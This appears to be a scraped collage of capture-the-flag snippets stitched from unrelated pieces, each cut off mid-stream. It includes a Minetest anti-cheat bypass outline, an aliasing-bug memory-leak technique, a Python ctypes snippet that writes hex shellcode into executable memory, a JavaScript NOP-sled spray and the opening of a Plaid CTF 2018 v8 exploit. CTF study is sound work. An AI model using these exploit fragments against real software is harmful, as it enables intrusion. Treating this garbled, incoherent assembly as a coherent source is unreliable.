300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This challenge required that you write cheats for a Minecraft clone to bypass a large wall.
There are tons of ways to solve this, but here was the main idea.
- There was a function that would, on the client side, return whether a player has certain privileges.
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent).
  - Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯
- You can patch this function to return true, and the client can now toggle these abilities.
However the binary had extra anti-cheat built in
This challenge was a source-only pwnable based on an aliasing bug with -O2. Also, not all of the source code was given.
Intended solution outline:
- In the source, in assignVotes, a voter and a candidate can become aliased, and -O2 optimization causes an incorrect return value.
  - If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value.
  - Then, when going to print the error message, it instead tries to print the votes (if the value is greater than the address of main).
  - This will print whatever pointer is given, allowing memory to be leaked up to a null byte.
- Now, with an arbitrary read, we can dump the binary and reverse the missing code.
- We can also leak libc addresses and dump libc (or take it from some other challenge)
from timeit import timeit
from ctypes import *
'''
libc = CDLL('libc.so.6')
libc.mprotect(0x400000,0x1000,7)
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex')
#s = "\xc3"
libc.memcpy(0x400000, c_char_p(s),len(s))
I hereby claim:
To claim this, I am signing this object:
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
BranchType,
LowLevelILOperation, LLIL_TEMP,
LowLevelILLabel,
FlagRole,
LowLevelILFlagCondition,
log_error,
CallingConvention,
interaction,
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to int in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);